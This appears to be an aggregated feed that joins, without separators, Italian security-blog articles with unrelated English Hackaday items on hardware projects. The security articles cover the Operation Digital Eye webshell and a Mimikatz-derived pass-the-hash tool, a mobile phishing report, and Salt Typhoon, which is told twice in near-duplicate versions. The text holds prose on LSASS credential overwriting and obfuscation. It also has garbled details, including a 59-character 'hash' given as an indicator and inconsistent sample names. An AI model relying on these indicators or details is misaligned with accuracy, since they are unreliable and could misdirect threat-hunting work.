Una delle varianti di PHPsert contiene frammenti di codice commentati in cinese semplificato che descrivono il codice vicino. Questi commenti e frammenti non sono presenti nelle versioni di PHPsert osservate in Operation Digital Eye, né in nessuna delle altre varianti della webshell. Di seguito sono riportati i commenti del codice, tutti tradotti automaticamente dal cinese semplificato:

• 结果是"assert", che si traduce in The result is "assert".
• 验证 $this->rg 是否安全, che si traduce in Verify that $this->rg is safe.
• 验证和清理用户输入, che si traduce in Validating and sanitizing user input.

Frammenti di codice PHPsert con commenti in cinese
La presenza di questi commenti, insieme agli indicatori di codice rimosso nelle varianti di PHPsert, suggerisce il potenziale coinvolgimento di sviluppatori di lingua cinese che potrebbero aver semplificato la logica di esecuzione della webshell.

Capacità di Pass-the-Hash

L’eseguibile bK2o.exe (una versione modificata personalizzata di Mimikatz utilizzata in Operation Digital Eye per gli attacchi pass-the-hash) consente l’esecuzione di processi all’interno del contesto di sicurezza di un utente sfruttando un hash di password NTLM compromesso, bypassando la necessità della password effettiva dell’utente. Per ottenere ciò, bK2o.exe sovrascrive la memoria del processo LSASS. Lo strumento supporta i seguenti parametri della riga di comando:

• /c: Processo da eseguire; cmd.exe se non specificato, il valore predefinito è .
• /u: Nome utente dell’utente.
• /d: Il dominio dell’utente.
• /h: Hash della password NTLM.

bK2o.exe implementa una tecnica pass-the-hash sovrascrivendo la memoria LSASS in modo simile a Mimikatz, con la sua implementazione parzialmente sovrapposta alle funzioni Mimikatz come kuhl_m_sekurlsa_pth_luide kuhl_m_sekurlsa_msv_enum_cred_callback_pth. In sintesi, bK2o.exe esegue quanto segue:

• Crea un processo sospeso in una nuova sessione di accesso, specificando il processo fornito dall’aggressore, il nome utente, il dominio e una password vuota.
• In base all’identificatore univoco locale (LUID) della sessione, individua ed estrae dalla memoria del processo LSASS un blob di dati di credenziali crittografati contenente l’hash NTLM dell’utente e le chiavi di crittografia necessarie per decrittografare il blob.
• Decrittografa il blob di dati, sovrascrive l’hash NTLM dell’utente con l’hash fornito dall’aggressore e crittografa nuovamente il blob di dati.
• Riprende il processo sospeso.

bK2o.exe crea un nuovo processo e recupera il LUID della sessione di accesso
Per navigare nella memoria LSASS, bK2o.exe usa le firme di codice, rappresentate come sequenze di byte in formato esadecimale. Queste sequenze corrispondono a istruzioni LSASS note, che servono come punti di navigazione all’interno della memoria.

Per ostacolare l’analisi statica ed eludere il rilevamento, bK2o.exe offusca le firme del codice e le stringhe costruendole dinamicamente sullo stack in fase di esecuzione, anziché memorizzarle come dati statici.
bK2o.exe costruisce la firma del codice 33 ff 41 89 37 4c 8b f3 […] sullo stack

Dall’operazione Digital Eye a Tainted Love e Soft Cell

Sono stati quindi identificati altri due campioni e caricati su piattaforme di condivisione malware che costruiscono firme di codice sullo stack, che si chiamano wsx1.exe e wsx1.exe. Come bK2o.exe, entrambi wsx.exe e wsx1.exe sono versioni personalizzate modificate di Mimikatz e implementano la funzionalità pass-the-hash.

Segmenti di codice sostanziali in wsx.exe e wsx1.exe, che implementano la costruzione di firme di codice sullo stack, si sovrappongono a quelli in bK2o.exe, includendo dimensioni mov e valori di operandi di istruzione identici. Ciò suggerisce che wsx.exe, wsx1.exe, e bK2o.exe sono molto probabilmente derivati ​​dalla stessa fonte.
Segmento di codice in bK2o.exe Segmento di codice in wsx1.exe
A loro volta, si è osservato sovrapposizioni tra i componenti wsx.exe, wsx1.exe e mim221. mim221 è uno strumento che esegue un “antifurto” di credenziali ben gestito e con più versioni, nonché una versione modificata personalizzata di Mimikatz, che SentinelLabs ha osservato nell’operazione Tainted Love, una campagna che ha preso di mira i fornitori di servizi di telecomunicazioni in Medio Oriente nel 2023.

Si è quindi attribuito Operation Tainted Love a un presunto gruppo cinese di cyberspionaggio all’interno del nesso tra Granite Typhoon (precedentemente noto come Gallium) e APT41, pur riconoscendo la possibilità di condivisione di strumenti tra attori di minacce sponsorizzati dallo stato cinese e il potenziale coinvolgimento di un fornitore condiviso o di un quartiermastro digitale. Si sta valutando che mim221 rappresenti un’evoluzione degli strumenti associati a Operation Soft Cell, come simplify_32.exe . Operation Soft Cell, che ha preso di mira i provider di telecomunicazioni nel 2017 e nel 2018, è stata collegata a Granite Typhoon e sono state suggerite anche possibili connessioni tra gli attori di Soft Cell e APT41.

mim221 ha un’architettura multi-componente, con un singolo eseguibile che organizza tre componenti — pc.dll, AddSecurityPackage64.dll, e getHashFlsa64.dll— usando tecniche come la decrittazione, l’iniezione e il caricamento di immagini riflettenti. Questi componenti condividono diverse sovrapposizioni con bK2o.exe, wsx.exe, e wsx1.exe.

Per ostacolare l’analisi statica, alcuni componenti mim221 offuscano anche le stringhe costruendole sullo stack in fase di esecuzione. Inoltre, i componenti mim221 AddSecurityPackage64.dlle getHashFlsa64.dll implementano la registrazione degli errori simile a quella di wsx.exe e wsx1.exe, inclusi messaggi di errore personalizzati identici, un formato di output coerente e gli stessi errori in lingua inglese.
Messaggi di errore in wsx.exe e wsx1.exe
Inoltre, le informazioni RTTI (Run-Time Type Information) memorizzate in wsx.exe, wsx1.exe, e nel componente mim221 getHashFlsa64.dll rivelano che classi con gli stessi nomi sono dichiarate in questi eseguibili. Non abbiamo osservato questi nomi di classe in strumenti open source o disponibili al pubblico.

L'articolo Operation Digital Eye: il primo attacco cinese che sfrutta Visual Studio Code come C2 proviene da il blog della sicurezza informatica.

Have you ever wished for easy mouse controls to go along with your VR headset experience? Or maybe you just want a cooler way to mouse in general. In any case, look no further than [rafgaj78]’s Bluetooth Mouse Ring project.

This is version two, which of course comes with several improvements over version one. The biggest change is from tactile buttons to a joystick input. [rafgaj78] also did away with the power switch, using deep-sleep mode instead. Version two is easier to assemble and offers improved ergonomics, as well as a range of ring sizes.

Like the first version, this ring runs on a Seeed Xiao nRF52840 and is programmed in CircuitPython. There are two modes to choose from. In one mode, the joystick does left and right mouse click and wheel up and down, while the push action recovers the micro from deep sleep. In the other mode, the joystick axis is a mouse pointer mover, and you push down to left click.

We really like this sleek design, and [rafgaj78] has great instructions if you want to build your own. This isn’t the first cool mouse ring we’ve seen, and it certainly won’t be the last.

hackaday.com/2024/12/10/update…

If you’ve ever wanted to merge the worlds of holiday cheer and clever geometry, [Kris Wilk]’s gingerbread house hack is your ultimate inspiration. Shared in a mesmerising video, [Wilk] showcases his 2024 entry for his neighborhood’s gingerbread house contest. Designed in FreeCAD and baked to perfection, this is no ordinary holiday treat. His pièce de résistance was a brilliant trompe l’oeil effect, visible only from one carefully calculated angle. Skip to the last twenty seconds of the video to wrap your head around how it actually looks.

[Wilk] used FreeCAD’s hidden true perspective projection function—a rarity in CAD software. This feature allowed him to calculate the perfect forced perspective, essential for crafting the optical illusion. The supporting structures were printed on a Prusa MK4, while the gingerbread itself was baked at home. Precision photography captured the final reveal, adding a professional touch to this homemade masterpiece. [Wilk]’s meticulous process highlights how accessible tools and a sprinkle of curiosity can push creative boundaries.

For those itching to experiment with optical illusions, this bakery battle is only the beginning. Why not build a similar one inside out? Or construct a gingerbread man in the same way? Fire up the oven, bend your mind, and challenge your CAD skills!

youtube.com/embed/Xm2xWJrqf-k?…

hackaday.com/2024/12/10/an-eng…

Secondo l’ultimo rapporto pubblicato da Zimperium Labs, i dispositivi mobili sono diventati l’obiettivo principale degli attacchi di phishing. Più di quattro quinti (82%) dei siti Web di phishing prendono di mira specificamente i dispositivi mobili e utilizzano il protocollo HTTPS per creare un “senso di sicurezza” per gli utenti.

Gli utenti in Medio Oriente e in Asia sono quelli maggiormente a rischio

Il rapporto ha rilevato che più della metà (54%) delle aziende ha subito una violazione dei dati a causa dell’accesso improprio dei dipendenti a informazioni sensibili sui dispositivi mobili. Il rapporto afferma: “Nel 2023, l’82% dei siti Web di phishing analizzati da Zimperium ha preso di mira specificamente i dispositivi mobili e ha fornito contenuti mobile, con un aumento del 7% rispetto agli ultimi tre anni” per attacchi di phishing.

Vale la pena notare che, secondo le statistiche di Cloudflare, la percentuale del traffico Internet mobile in Asia, Africa e Medio Oriente è significativamente più elevata che in Europa e nelle Americhe, e il rischio di subire attacchi di phishing mobile è maggiore. Tra i paesi più popolosi dell’Asia orientale e meridionale, l’India è al primo posto con oltre l’80% del traffico Internet mobile, seguita da Indonesia (68%) e Cina (65%) rispettivamente al secondo e terzo posto.

Traffico Internet mobile globale. Fonte Cloudflare

Nel teso Medio Oriente e nell’Asia occidentale, lo Yemen è al primo posto per traffico Internet mobile (83%), seguito da Siria (82%), Iran (71%), Iraq (70%) e Pakistan (70%). , quarto e quinto.

Tre fattori che guidano la crescita degli attacchi di phishing mobile

Il rapporto evidenzia inoltre tre fattori chiave alla base dell’ondata di attacchi di phishing mobile: l’uso diffuso di dispositivi personali al lavoro, la scarsa igiene della sicurezza informatica sui dispositivi mobili e l’uso delle AI da parte dei malintenzionati. Rispetto ai sistemi desktop, i dispositivi mobili di solito non dispongono di misure di sicurezza adeguate e, insieme ai loro schermi più piccoli, è più probabile che gli utenti ignorino i collegamenti nascosti o gli URL falsi sui siti Web di phishing.

La ricerca mostra che il 71% dei dipendenti utilizza gli smartphone per gestire le attività lavorative e il 60% utilizza i telefoni cellulari per le comunicazioni legate al lavoro. Inoltre, l’82% delle aziende consente una qualche forma di politica BYOD (Bring Your Own Device), il che si traduce in circa il 48% dei dipendenti che utilizzano i propri telefoni cellulari personali per accedere alle informazioni di lavoro, trascorrendo in media tre ore al giorno sui propri telefoni cellulari per lavoro. importa.

Patrick Tiquet, Vice President of Security and Architecture di Zimperium, ha dichiarato: “Poiché i dispositivi mobili diventano strumenti critici per le operazioni aziendali, garantire la loro sicurezza diventa fondamentale, soprattutto contro vari tipi di attacchi di phishing. Le aziende dovrebbero implementare solide policy di gestione dei dispositivi mobili (MDM). per garantire che i dispositivi forniti dall’azienda e i dispositivi BYOD siano conformi agli standard di sicurezza. L’aggiornamento regolare dei dispositivi e del software di sicurezza può correggere tempestivamente le vulnerabilità e proteggere dalle minacce note”

L’ascesa del phishing HTTPS

Il rapporto sottolinea che la tendenza dei siti web di phishing che utilizzano il protocollo HTTPS per creare un “senso di sicurezza” negli utenti è diventata sempre più evidente. Krishna Vishnubhotla, vicepresidente della strategia di prodotto di Zimperium, ha spiegato: “Sebbene i siti di phishing HTTPS non siano una novità, negli ultimi anni sempre più siti di phishing hanno preso di mira i dispositivi mobili, una tendenza che continua a crescere”.

Ha aggiunto: “Le interfacce mobili rendono più facile per gli utenti confondersi perché i browser raramente visualizzano gli URL completi e tendono a reindirizzare rapidamente. Inoltre, gli utenti tendono a pensare che i collegamenti con l’icona di un lucchetto nel browser siano sicuri, soprattutto sui dispositivi mobili. Pertanto , gli utenti non devono solo verificare se nell’URL del browser è presente l’icona del lucchetto, ma anche controllare attentamente il nome del dominio del sito Web per evitare di inserire informazioni sensibili nei siti Web di phishing.“

La gestione dei dispositivi mobili e i gestori di password

Per combattere efficacemente gli attacchi di phishing mobile, gli esperti consigliano di utilizzare la gestione dei dispositivi mobili (MDM) e i gestori di password. Le soluzioni MDM possono aiutare le aziende a implementare policy di sicurezza, controllare le autorizzazioni delle applicazioni, garantire che i dispositivi vengano aggiornati con patch di sicurezza in modo tempestivo e ridurre il rischio di attacchi di phishing.

Tiquet ha sottolineato: “Le soluzioni MDM possono garantire la conformità e limitare l’accesso ai dati attraverso lo stato di integrità del dispositivo, garantendo una politica di sicurezza mobile completa, piuttosto che fare affidamento esclusivamente sugli aggiornamenti del sistema operativo. Una crittografia avanzata e la gestione automatica delle patch possono migliorare ulteriormente la sicurezza del dispositivo.”

Inoltre, i gestori di password possono generare e archiviare password complesse e uniche, impedendo agli utenti di riutilizzare le credenziali su più servizi e riducendo il tasso di successo degli attacchi di phishing.

L'articolo 82% dei Siti di Phishing Prendono di Mira i Cellulari: Scopri Come Proteggerti proviene da il blog della sicurezza informatica.

Un vento tempestoso soffia nel cyberspazio, scuotendo infrastrutture critiche e aziende strategiche in tutto il mondo. È l’Operazione “Salt Typhoon”, un attacco informatico senza precedenti attribuito a un gruppo di cybercriminali cinesi. Questi hacker, legati al Ministero della Sicurezza di Stato cinese, hanno dimostrato una precisione e una complessità che mettono in discussione la sicurezza globale, rendendo il cyberspazio un terreno di scontro tra superpotenze. La vicenda non è solo una questione di tecnologia, ma il riflesso di una lotta geopolitica sempre più intensa.

Salt Typhoon: Un attacco orchestrato con precisione chirurgica

La struttura dell’attacco, così come ricostruita dalle analisi di threat intelligence e rappresentata nello schema allegato, appare quasi come una mappa di guerra. Al centro di questa rete si trova un nodo principale, definito “Suspected China-based threat actor”. Questo elemento centrale agisce come il cervello dell’operazione, orchestrando ogni movimento e dirigendo i flussi di dati verso destinazioni strategiche. Dal nodo principale si dipartono numerose connessioni, veri e propri fili invisibili che collegano il gruppo di hacker agli obiettivi disseminati in tutto il mondo.

Il diagramma rivela la complessità dell’attacco. Ogni collegamento non è casuale: i flussi diretti verso i server, gli hash di file dannosi e le tecniche utilizzate per compromettere i target mostrano un piano studiato nei minimi dettagli. Si tratta di un’opera ingegneristica del crimine informatico, dove nulla è lasciato al caso. Gli hacker hanno sfruttato indirizzi IP (come il 149.28.154.23) per il controllo remoto e l’esfiltrazione dei dati, mentre strumenti avanzati e tattiche di offuscamento hanno permesso loro di passare inosservati per mesi.

Gli obiettivi: colpire il cuore delle infrastrutture globali

Ma chi sono stati i bersagli di questa operazione? La scelta degli obiettivi rivela molto sulle intenzioni degli attaccanti. Non si tratta solo di raccogliere informazioni, ma di destabilizzare e acquisire un vantaggio strategico in settori chiave. Tra i principali bersagli troviamo:

1. Colossi delle telecomunicazioni come AT&T, Verizon e T-Mobile. Queste aziende rappresentano la spina dorsale delle comunicazioni globali. Comprometterle significa accedere a dati sensibili, intercettare conversazioni e monitorare le comunicazioni di figure chiave.
2. Campagne politiche di alto profilo. Gli attaccanti hanno mirato a personalità di rilievo della scena politica statunitense, come membri dello staff delle campagne presidenziali di Kamala Harris e Donald Trump. L’obiettivo? Ottenere informazioni strategiche e, potenzialmente, manipolare le dinamiche politiche.
3. Infrastrutture critiche come il settore energetico e della difesa. Questi obiettivi sono stati scelti per la loro importanza strategica, con la possibilità di preparare azioni di sabotaggio o semplicemente per rubare informazioni classificate.

La cassetta degli attrezzi degli hacker

Dietro questo attacco si cela una vera e propria “cassetta degli attrezzi” digitale, piena di strumenti sofisticati e tecniche avanzate. Gli hacker di “Salt Typhoon” hanno utilizzato un mix di approcci che dimostrano la loro abilità tecnica e la capacità di eludere i sistemi di sicurezza più avanzati. Tra le tattiche principali si distinguono:

• DLL-sideloading: una tecnica che sfrutta vulnerabilità nei file di sistema per caricare malware mascherati da componenti legittimi.
• Living off the land: l’arte di utilizzare strumenti già presenti nei sistemi compromessi, come PowerShell o strumenti di amministrazione remota, per evitare di essere rilevati.
• Server di comando e controllo (C2): gli indirizzi IP indicati nello schema (ad esempio 149.28.154.23) sono stati utilizzati per inviare istruzioni ai malware e raccogliere dati esfiltrati.

Questi strumenti sono stati arricchiti da tecniche di offuscamento, come la firma digitale contraffatta, che hanno reso i malware difficili da identificare anche per i software di sicurezza più avanzati. Inoltre, l’uso di hash univoci, come 23221b6f59b9e3b164a7021f2ac86c1df88a0fa78822f8500357eefaff0, ha permesso agli attaccanti di nascondere la propria presenza e mantenere un accesso persistente alle reti compromesse.

Lo schema dell’attacco di Salt Typhoon: una guida visiva alla complessità

L’immagine che accompagna questa analisi racconta molto più di quanto le parole possano fare. Mostra come i flussi dell’attacco si ramifichino dal nodo centrale, “Suspected”, verso una serie di obiettivi altamente strategici. Ogni flusso rappresenta un’azione: l’invio di un comando, la trasmissione di dati rubati, o il collegamento a un server remoto.

Gli indirizzi IP rappresentati nella parte inferiore dello schema sono i punti di raccolta per l’esfiltrazione dei dati, mentre gli hash colorati identificano specifici file dannosi utilizzati per penetrare i sistemi. È come osservare una rete neurale, dove ogni collegamento è un’operazione pensata per massimizzare il danno e raccogliere informazioni preziose.

Le conseguenze: una minaccia globale

L’impatto di questo attacco è stato devastante. Le aziende colpite devono affrontare non solo i costi diretti per il ripristino della sicurezza, ma anche la perdita di fiducia da parte di clienti e partner. A livello geopolitico, l’Operazione “Salt Typhoon” ha intensificato le tensioni tra Stati Uniti e Cina, alimentando accuse di spionaggio e ingerenza.

La risposta internazionale

Di fronte a un attacco di questa portata, gli Stati Uniti hanno reagito rapidamente, formando una task force multi-agenzia per indagare sull’incidente e rafforzare le difese cibernetiche. Gli esperti di sicurezza hanno condiviso gli indicatori di compromissione (IOC) individuati, nella speranza di prevenire ulteriori attacchi e contenere i danni.

Tuttavia, l’incidente solleva domande più ampie sulla resilienza delle infrastrutture globali e sull’urgenza di una maggiore collaborazione internazionale per combattere le minacce informatiche.

Un monito per il futuro

L’Operazione “Salt Typhoon” non è solo un attacco informatico: è un campanello d’allarme per un mondo sempre più interconnesso. Ogni azienda, ogni governo, e ogni individuo deve comprendere che la sicurezza nel cyberspazio è una responsabilità collettiva. Investire in tecnologia, formazione e consapevolezza sarà fondamentale per affrontare le sfide di un futuro digitale dove la linea tra spionaggio e guerra diventa sempre più sottile.

Questo attacco è un promemoria: nel cyberspazio, nessuno è al sicuro, e la prossima vittima potrebbe essere chiunque.

Un’operazione di spionaggio cibernetico senza precedenti ha fatto emergere tutta la vulnerabilità delle infrastrutture critiche globali. L’Operazione “Salt Typhoon”, attribuita a un gruppo di cybercriminali cinesi legati al Ministero della Sicurezza di Stato cinese, rappresenta un esempio lampante di quanto sofisticati possano essere oggi gli attacchi informatici. Con obiettivi che spaziano dalle telecomunicazioni alle campagne politiche, l’attacco dimostra come il cyberspazio sia ormai il campo di battaglia preferito per conflitti geopolitici e spionaggio internazionale.

Un’operazione pianificata nei minimi dettagli

Secondo le analisi di threat intelligence, “Salt Typhoon” è operativo dal 2020 e ha colpito obiettivi strategici in Nord America e nel Sud-Est asiatico. L’attacco in questione, avvenuto tra aprile e agosto 2024, è stato condotto con una precisione chirurgica, compromettendo diverse infrastrutture critiche e raccogliendo dati sensibili. Un’immagine dettagliata dello schema d’attacco mostra come tutto sia stato meticolosamente orchestrato.

Al centro dell’operazione c’è un nodo principale, etichettato come “Suspected”, che funge da centro nevralgico per la distribuzione di malware e l’esfiltrazione dei dati. Da questo nodo si diramano numerosi collegamenti verso obiettivi specifici, ognuno dei quali rappresenta un elemento chiave del piano. Non si tratta di un’azione casuale: ogni bersaglio è stato scelto con cura per massimizzare l’impatto strategico.

Le vittime di Salt Typhoon: chi è finito nel mirino

Tra i bersagli principali ci sono stati:

• Colossi delle telecomunicazioni: AT&T, Verizon e T-Mobile, compromessi per intercettare comunicazioni sensibili e raccogliere dati preziosi.
• Campagne politiche statunitensi: Tra gli obiettivi figurano personalità di rilievo, tra cui membri dello staff delle campagne presidenziali di Kamala Harris e Donald Trump.
• Infrastrutture critiche: Settori energetici, reti di trasporto e persino organizzazioni di difesa, con l’obiettivo di acquisire informazioni strategiche o preparare potenziali sabotaggi.

L’intrusione si è protratta per mesi, con gli attaccanti che hanno ottenuto accesso persistente ai sistemi compromessi grazie all’uso di tecniche avanzate e sofisticate.

Il “kit degli attrezzi” di Salt Typhoon

L’attacco ha messo in mostra un arsenale tecnologico all’avanguardia. Tra le tecniche utilizzate spiccano:

• DLL-sideloading: Una tecnica che sfrutta file di sistema Windows per caricare malware mascherati da componenti legittimi, eludendo i sistemi di sicurezza.
• Living off the land: Gli attaccanti hanno utilizzato strumenti già presenti nei sistemi colpiti, come PowerShell e comandi di amministrazione, per evitare di essere rilevati.
• Server di comando e controllo (C2): Gli indirizzi IP individuati nello schema (es. 149.28.154.23) sono stati utilizzati per inviare istruzioni ai malware e raccogliere dati esfiltrati.
• Offuscamento e firma digitale contraffatta: Malware progettati per nascondere la loro natura malevola, sfruttando tecniche avanzate di offuscamento.

Dallo schema emerge chiaramente una serie di hash univoci che identificano i file dannosi utilizzati nell’attacco, come 23221b6f59b9e3b164a7021f2ac86c1df88a0fa78822f8500357eefaff0. Questi hash, insieme ai log di connessione verso i server C2, hanno permesso agli esperti di tracciare le attività del gruppo.

Il disegno strategico di Salt Typhoon

La scelta degli obiettivi non è stata casuale. Le telecomunicazioni rappresentano un’infrastruttura critica che consente di monitorare le comunicazioni in tempo reale, sia a livello privato che istituzionale. Le campagne politiche, invece, offrono informazioni preziose per influenzare decisioni strategiche o prevedere le mosse di avversari geopolitici.

Ogni nodo nello schema rappresenta un preciso tassello del piano complessivo: un’operazione altamente coordinata e pianificata con cura. Questo livello di precisione indica chiaramente che dietro l’operazione ci sono risorse significative e competenze avanzate.

Le conseguenze dell’attacco

L’Operazione “Salt Typhoon” ha avuto un impatto devastante su più fronti:

1. Danni immediati: Dati sensibili sottratti, sistemi compromessi e costi enormi per ripristinare la sicurezza.
2. Erosione della fiducia: Le aziende colpite devono affrontare non solo danni economici ma anche una perdita di reputazione, mentre i cittadini temono per la sicurezza dei propri dati.
3. Tensioni geopolitiche: Gli attacchi attribuiti a “Salt Typhoon” intensificano le già fragili relazioni tra Stati Uniti e Cina, alimentando le accuse di spionaggio.

La risposta internazionale

Gli Stati Uniti hanno immediatamente formato una task force multi-agenzia per affrontare la minaccia e proteggere le infrastrutture critiche. Gli esperti di sicurezza hanno condiviso gli indicatori di compromissione (IOC) individuati, come gli indirizzi IP e gli hash dei file malevoli, nella speranza di contenere l’impatto e prevenire ulteriori attacchi.

Tuttavia, l’incidente solleva interrogativi più ampi sulla necessità di rafforzare le difese cibernetiche globali e investire in tecnologie di rilevamento più avanzate.

Conclusioni: un campanello d’allarme per il futuro

L’Operazione “Salt Typhoon” è un monito per governi e aziende: il cyberspazio è diventato un campo di battaglia dove si giocano le sfide del futuro. Gli attacchi non riguardano più solo furti di dati o interruzioni temporanee, ma rappresentano una minaccia diretta alla sicurezza nazionale e alla stabilità globale.

Mentre i responsabili sono ancora attivi e il rischio di nuovi attacchi persiste, è chiaro che la cooperazione internazionale e una maggiore consapevolezza saranno fondamentali per proteggere il nostro mondo sempre più interconnesso.

L'articolo Salt Typhoon: Anatomia dell’attacco cibernetico e del sospetto coinvolgimento cinese proviene da il blog della sicurezza informatica.

Robots are super interesting, but you probably shouldn’t start learning about them with a full-sized industrial SCARA arm or anything. Better to learn with something smaller and simpler to understand. This simple Arduino-powered robot is called Bug, and it aims to be just that.

The design comes to us from [Joshua Stanley]. It’s based around the ubiquitous Arduino Uno, paired with a motor control and I/O shield for more connectivity. The robot uses treads for locomotion—each side has two wheels wrapped in a belt for grip. The robot has a small DC gearmotor driving each belt so it can be driven forwards, backwards, and steered differentially. To perceive the world, it uses an off-the-shelf ultrasonic transceiver module, and an NRF24L01 module for remote control. All this is wrapped up in a basic 3D-printed housing that positions the ultrasonic modules effectively as “eyes” which is kind of cute, all in all.

Despite its small size and simple construction, Bug gets around perfectly well in testing on an outdoor footpath. It even has enough torque to flip itself up at full throttle. For now, [Joshua] notes it’s a glorified remote control car, but he plans to expand it further with more functionality going forward.

We see lots of educational robots around these parts, like this nifty little robot arm. Video after the break.

youtube.com/embed/kZliyDbgqg8?…

[Thanks to Jan-Willem for the tip!]

hackaday.com/2024/12/09/a-simp…

It’s one of the great tragedies of our technological era. Smartphones that feature an incredible amount of computational power compared to computers the past, are largely locked down by carriers or manufacturers, dooming them to performing trivial tasks far below their true capabilities.

But there is hope. In part one of this build, a OnePlus 6T is stripped of its Android operating system in favor of postmarketOS, a Linux distribution based on Alpine designed for a number of Android phones and tablets as well as some Linux-only handhelds. The guide also demonstrates how to remove the battery and use a modified USB-C cable to essentially trick the battery management system into powering up the phone anyway. The second part of the project dives into the software side, getting the Linux system up and running before installing Docker and whichever Docker containers the user needs.

There are a few downsides to running a server from a smartphone. Although there’s plenty of processing power available for a wide range of applications, most phones won’t have Ethernet support out-of-the-box which forces the use of WiFi. There’s also limited storage options available, so a large NAS system may be out of reach. But for something like a home automation system or a music streaming server this could put plenty of older devices to work again. And if you don’t want to hunt for an Android phone that isn’t completely hobbled out-of-the box you might want to try a phone that’s Linux-based from the get-go instead.

Thanks to [JohnU] for the tip!

hackaday.com/2024/12/09/smartp…

If you want to reverse engineer the boards in a modern console, you’d better have a lab, a lot of fancy gear, and a good few months to dedicate to the task. The humble PlayStation, on the other hand, is more accessible in this regard. [Lawrence Brode] pulled one apart and started documenting it as part of a grander quest for console understanding.

[Lawrence’s] ultimate goal is to create a portable PlayStation using original hardware. That is, rather than cannibalizing an existing console, he wants to build an original portable from scratch. He needed to understand the PlayStation to recreate it, so he started by analyzing the original hardware.

The first part of [Lawrence’s] quest was to try and reverse engineer the PlayStation motherboard itself. The 1990s console has the benefit of only using a two-layer PCB, meaning it’s far easier to trace out than more modern multi-layer designs. [Lawrence] started with a damaged console, pulled out the motherboard, and stripped off all the components. He then cleaned the board, scanned it, and then sandblasted it to remove the solder mask.

He’s begun the work of tracing out signals, and next on the agenda is to create a new custom PCB that’s compatible with the original PlayStation hardware. You can grab his work via GitHub if you’re interested. [Lawrence] is also excited about the possibilities of grabbing the 24-bit RGB signal heading into the GPU and using it for an HDMI output conversion in the future.

It’s always an exciting time in the PlayStation community; we see lots of great hacks on the regular. If you’re cooking up your own, don’t hesitate to drop us a line!

hackaday.com/2024/12/09/playst…

Raspberry Pi just dropped the new Raspberry Pi 500, which like its predecessor puts the similarly named SBC into a keyboard. In a detailed review and teardown video, [Jeff Geerling] goes over all the details, and what there is to like and not like about this new product.
The new Raspberry Pi 500 with the new Raspberry Pi Monitor. (Credit: Jeff Geerling)
Most of the changes relative to the RP400 are as expected, with the change to the same BCM2712 SoC as on the Raspberry Pi 5, while doubling the RAM to 8 GB and of course you get the soft power button. As [Jeff] discovers with the teardown, the odd thing is that the RP500 PCB has the footprints for an M.2 slot, as seen on the above image, but none of the components are populated.

Naturally, [Jeff] ordered up some parts off Digikey to populate these footprints, but without luck. After asking Raspberry Pi, he was told that these footprints as well as those for a PoE feature are there for ‘flexibility to reuse the PCB in other contexts’. Sadly, it seems that these unpopulated parts of the board will have to remain just that, with no M.2 NVMe slot option built-in. With the price bump to $90 from the RP400’s $70 you’ll have to do your own math on whether the better SoC and more RAM is worth it.

In addition to the RP500 itself, [Jeff] also looks at the newly launched Raspberry Pi Monitor, a 15.6″ IPS display for $100. This unit comes with built-in speakers and VESA mount, but as [Jeff] notes in his review, using this VESA mount also means that you’re blocking all the ports, so you have to take the monitor off said VESA mount if you want to plug in or out any cables.

youtube.com/embed/omYWRb1dLA4?…

youtube.com/embed/CnBu1wuoWew?…

hackaday.com/2024/12/09/raspbe…

Imagine the power to clone your favorite LEGO piece—not just any piece, but let’s say, one that costs €50 second-hand. [Balazs] from RacingBrick posed this exact question: can a 3D scanner recreate LEGO pieces at home? Armed with Creality’s CR-Scan Otter, he set out to duplicate a humble DUPLO sheep and, of course, tackle the holy grail of LEGO collectibles: the rare LEGO goat.

The CR-Scan Otter is a neat gadget for hobbyists, capable of capturing objects as small as a LEGO piece. While the scanner proved adept with larger, blocky pieces, reflective LEGO plastic posed challenges, requiring multiple scans for detailed accuracy. With clever use of 3D printed tracking points, even the elusive goat came to life—albeit with imperfections. The process highlighted both the potential and the limitations of replicating tiny, complex shapes. From multi-colored DUPLO sheep to metallic green dinosaur jaws, [Balazs]’s experiments show how scanners can fuel customization for non-commercial purposes.

For those itching to enhance or replace their builds, this project is inspiring but practical advice remains: cloning LEGO pieces with a scanner is fun but far from plug-and-play. Check out [Balazs]’s exploration below for the full geeky details and inspiration.

youtube.com/embed/zlnL8oCtJMY?…

hackaday.com/2024/12/09/do-3d-…

What’s the most important keyboard macro you know? Honestly, it’s probably Ctrl-S. But do you use that one often enough? Chances are, you do not. What you need is a giant, dedicated Save keyboard that looks like a floppy disk.

Image by [Makestreme] via Hackaday.IO[Makestreme] recently started creating YouTube videos, but wasn’t pressing Save often enough. Couple that with editing software that crashes, and the result is hours of lost work.

Just like you’d expect, pressing the floppy icon triggers Ctrl-S when connected over USB-C. Internally, it’s a Seeeduino Xiao, a push button, and some wires.

The floppy disk itself is made of foam board, and everything is encased in a picture frame. If you want to make one for yourself, [Makestreme] has some great instructions over on IO.

Folding Keyboard Working After Five Hours of Debugging

Wishing for something compact and foldable, [sushiiiiiiiiiiiiii] created this seemingly nameless wonder that sort of resembles a concertina. The initial idea was to have both halves separate and make the thumb cluster unfold, but the making the linkage work correctly turned out to be a nightmare.

Image by [sushiiiiiiiiiiiiii] via redditInternally, this keyboard sports a pair of SuperMini nRF52840s plus a third one to make into a dongle. Those switches are Kailh Deep Sea Tactile Whales, which are silent, low-profile numbers.

They are topped with beautiful KLP Lamé keycaps I’d really like to touch that [sushiiiiiiiiiiiiii] had printed through JLC. It runs on six IKEA LADDA Ni-MH AAA cells [sushiiiiiiiiiiiiii] had laying around that the integrated Li-ion charger “shouldn’t explode” based on research.

Programming was a different kind of nightmare. [sushiiiiiiiiiiiiii] went through the ZMK setup, but the thing just would not show up on any Bluetooth device. After several hours of checking absolutely everything, [sushiiiiiiiiiiiiii] went back to the guide and discovered the programmer’s bane — an errant space after a comma that screwed everything up. The next version will have a reworked hinge and be less wobbly.

The Centerfold: A Little Comic Relief

Image by [xfactorxsuh] via redditYes, this is an actual keyboard with actual keycaps. Although it would probably give most people a headache after a while, this setup is pretty darn cool. As you can see in the pictures, [xfactorxsuh] covered an existing keyboard of unknown-to-me make and model with masking tape and then went to town with a fine-tipped black marker. This was done to match the PBT comic book keycaps, which actually come that way from Ali.

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: Defi-ing Typical Typewriter Prices

Image via The Antikey Chop
First and foremost: although it looks nice, the reason why this Defi is screwed to a metal base is unknown. This typewriter came standard with a wood base and cost a mere $25 in the early 1900s, whereas most machines were more like $60-$100. A metal base would probably have made it cost more.

